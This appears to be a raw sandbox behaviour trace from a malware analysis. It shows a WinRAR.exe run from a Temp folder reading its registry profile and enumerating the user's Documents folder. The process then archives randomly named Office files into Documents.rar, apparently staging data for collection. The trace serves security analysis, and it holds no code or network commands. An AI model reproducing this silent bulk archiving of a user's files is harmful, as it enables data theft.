Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = VolSizeMod, data = 2, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = VolPause, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = OldVolNames, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = RecVolNumber, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Update, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Fresh, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SyncFiles, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Overwrite, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Move, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ArcRecBin, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ArcWipe, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = WipeIfPassword, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Solid, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Test, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = RecEnabled, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = RecSize, data = 4294967293, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Recovery, data = 0, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = EraseDest, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = AddArcOnly, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ClearArc, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Lock, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Method, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = DictSizeLZ, data = 4194304, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = DictSize, data = 33554432, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Name, data = Default Profile, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = PasswordData, type = REG_BINARY True 1
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = EncryptHeaders, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ZipLegacyEncrypt, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = OpenShared, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ProcessOwners, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SaveStreams, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SaveSymLinks, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SaveHardLinks, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Background, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = WaitForOther, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Shutdown, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = GenerateArcName, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = VersionControl, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = BLAKE2, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileCopies, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = QuickOpen, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = GenerateMask, data = yyyymmddhhmmss, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileTimeMode, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileDays, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileHours, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileMinutes, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ArcTimeOriginal, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ArcTimeLatest, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = mtime, data = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ctime, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = atime, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = PathsAbs, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = PathsNone, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = PathsAbsDrive, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ImmExec, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SeparateArc, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SeparateArcDoubleExt, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SeparateArcSubfolders, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = EmailArcTo, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = PackDetails, type = REG_BINARY True 1
Fn
Data
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\WinRAR\Policy False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Policy False 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Module Load module_name = C:\Windows\system32\Crypt32.dll, base_address = 0x7fefdc00000 True 1
Fn
Module Get Address module_name = c:\windows\system32\crypt32.dll, function = CryptProtectMemory, address_out = 0x7fefdc316f8 True 1
Fn
Module Get Address module_name = c:\windows\system32\crypt32.dll, function = CryptUnprotectMemory, address_out = 0x7fefdc3171c True 1
Fn
File Get Info filename = Documents, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\Documents\Documents, type = file_attributes False 1
Fn
File Get Info filename = Documents.rar, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\Documents\Documents.rar, type = file_attributes False 1
Fn
File Get Info filename = Documents.zip, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\Documents\Documents.zip, type = file_attributes False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Compression False 1
Fn
File Create filename = Documents.rar, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = \\?\C:\Users\WhuOXYsD\Documents\Documents.rar, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = Documents.rar, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\Documents\Documents.rar, type = file_attributes False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes, value_name = ActivePath, data = 0, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\Themes, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\Themes, type = file_attributes False 1
Fn
Module Get Filename module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\rarlng.dll, process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 2048 True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes, value_name = ShellExtBMP, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes, value_name = ShellExtIcon, size = 2, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList False 1
Fn
Window Create class_name = SysListView32, wndproc_parameter = 0 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList False 6
Fn
System Get Info type = Operating System True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths False 9
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnStates False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnStates False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnStates False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnStates False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnStates False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnStates False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnStates False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnStates False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnStates False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnStates False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
Fn
File Get Info filename = Documents.rar, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\Documents\Documents.rar, type = file_attributes False 1
Fn
System Get Time type = Performance Ctr, time = 12901208574 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface, value_name = SystemProgressBar, data = 1, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface, value_name = TaskbarProgressBar, data = 1, type = REG_NONE False 1
Fn
Window Create class_name = tooltips_class32, wndproc_parameter = 0 True 1
Fn
Window Create class_name = tooltips_class32, wndproc_parameter = 0 True 1
Fn
System Get Time type = Ticks, time = 10896545 True 1
Fn
System Get Time type = Ticks, time = 10896545 True 1
Fn
System Get Time type = Ticks, time = 10896560 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
File Get Info filename = My Music, type = file_attributes True 1
Fn
File Get Info filename = My Pictures, type = file_attributes True 1
Fn
File Get Info filename = My Videos, type = file_attributes True 1
Fn
System Get Time type = Ticks, time = 10896560 True 1
Fn
System Get Time type = Ticks, time = 10896560 True 1
Fn
System Get Time type = Ticks, time = 10896560 True 1
Fn
System Get Time type = Ticks, time = 10896560 True 1
Fn
System Get Time type = Ticks, time = 10896638 True 1
Fn
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x77ae0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = CompareStringOrdinal, address_out = 0x77afd720 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:17 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 12927458107 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:17 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 12927583358 True 1
Fn
File Create filename = Documents.rar, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = \\?\C:\Users\WhuOXYsD\Documents\Documents.rar, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = Documents.rar, desired_access = GENERIC_WRITE, GENERIC_READ True 1
Fn
System Get Time type = Ticks, time = 10896654 True 1
Fn
File Write filename = Documents.rar, size = 8 True 1
Fn
Data
File Write filename = Documents.rar, size = 17 True 1
Fn
Data
File Create filename = -Rh7mA95EzQMCjv.pptx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10908432 True 1
Fn
System Get Time type = Performance Ctr, time = 14293281261 True 1
Fn
System Get Time type = Ticks, time = 10908447 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14300498529 True 1
Fn
File Read filename = -Rh7mA95EzQMCjv.pptx, size = 1048576, size_out = 41644 True 1
Fn
Data
File Read filename = -Rh7mA95EzQMCjv.pptx, size = 1006932, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10908525 True 1
Fn
System Get Time type = Performance Ctr, time = 14301568710 True 1
Fn
System Get Time type = Ticks, time = 10908525 True 1
Fn
System Get Time type = Ticks, time = 10908525 True 1
Fn
System Get Time type = Ticks, time = 10908525 True 1
Fn
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Time type = Ticks, time = 10908603 True 1
Fn
System Get Time type = Performance Ctr, time = 14310599580 True 1
Fn
System Get Time type = Ticks, time = 10908619 True 3
Fn
File Write filename = Documents.rar, size = 41744 True 1
Fn
Data
File Write filename = Documents.rar, size = 104 True 1
Fn
Data
File Create filename = 0eTc aT.pptx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10908666 True 1
Fn
System Get Time type = Ticks, time = 10908666 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14316067883 True 1
Fn
File Read filename = 0eTc aT.pptx, size = 1048576, size_out = 101467 True 1
Fn
Data
File Read filename = 0eTc aT.pptx, size = 947109, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10908666 True 1
Fn
System Get Time type = Performance Ctr, time = 14316335233 True 1
Fn
System Get Time type = Ticks, time = 10908666 True 3
Fn
System Get Time type = Ticks, time = 10908697 True 1
Fn
System Get Time type = Performance Ctr, time = 14318681311 True 1
Fn
System Get Time type = Ticks, time = 10908697 True 3
Fn
File Write filename = Documents.rar, size = 101696 True 1
Fn
Data
File Write filename = Documents.rar, size = 96 True 1
Fn
Data
File Create filename = 0WMsLhv.docx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10908697 True 1
Fn
System Get Time type = Ticks, time = 10908697 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14319638275 True 1
Fn
File Read filename = 0WMsLhv.docx, size = 1048576, size_out = 56780 True 1
Fn
Data
File Read filename = 0WMsLhv.docx, size = 991796, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10908713 True 1
Fn
System Get Time type = Performance Ctr, time = 14320079653 True 1
Fn
System Get Time type = Ticks, time = 10908713 True 4
Fn
System Get Time type = Performance Ctr, time = 14320563578 True 1
Fn
System Get Time type = Ticks, time = 10908713 True 3
Fn
File Write filename = Documents.rar, size = 56928 True 1
Fn
Data
File Write filename = Documents.rar, size = 96 True 1
Fn
Data
File Create filename = 0XuPmKuUcJqUgUNn.pptx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10908713 True 1
Fn
System Get Time type = Ticks, time = 10908713 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14321184827 True 1
Fn
File Read filename = 0XuPmKuUcJqUgUNn.pptx, size = 1048576, size_out = 60489 True 1
Fn
Data
File Read filename = 0XuPmKuUcJqUgUNn.pptx, size = 988087, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10908713 True 1
Fn
System Get Time type = Performance Ctr, time = 14321421374 True 1
Fn
System Get Time type = Ticks, time = 10908713 True 3
Fn
System Get Time type = Ticks, time = 10908728 True 1
Fn
System Get Time type = Performance Ctr, time = 14321972592 True 1
Fn
System Get Time type = Ticks, time = 10908728 True 3
Fn
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
File Write filename = Documents.rar, size = 60608 True 1
Fn
Data
File Write filename = Documents.rar, size = 105 True 1
Fn
Data
File Create filename = 19uvJahSx.pptx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10908728 True 1
Fn
System Get Time type = Ticks, time = 10908728 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14322609535 True 1
Fn
File Read filename = 19uvJahSx.pptx, size = 1048576, size_out = 12168 True 1
Fn
Data
File Read filename = 19uvJahSx.pptx, size = 1036408, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10908728 True 1
Fn
System Get Time type = Performance Ctr, time = 14322828928 True 1
Fn
System Get Time type = Ticks, time = 10908728 True 4
Fn
System Get Time type = Performance Ctr, time = 14323005459 True 1
Fn
System Get Time type = Ticks, time = 10908728 True 3
Fn
File Write filename = Documents.rar, size = 12208 True 1
Fn
Data
File Write filename = Documents.rar, size = 98 True 1
Fn
Data
File Create filename = 1dt_j0rkw.xlsx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10908744 True 1
Fn
System Get Time type = Ticks, time = 10908744 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14323429322 True 1
Fn
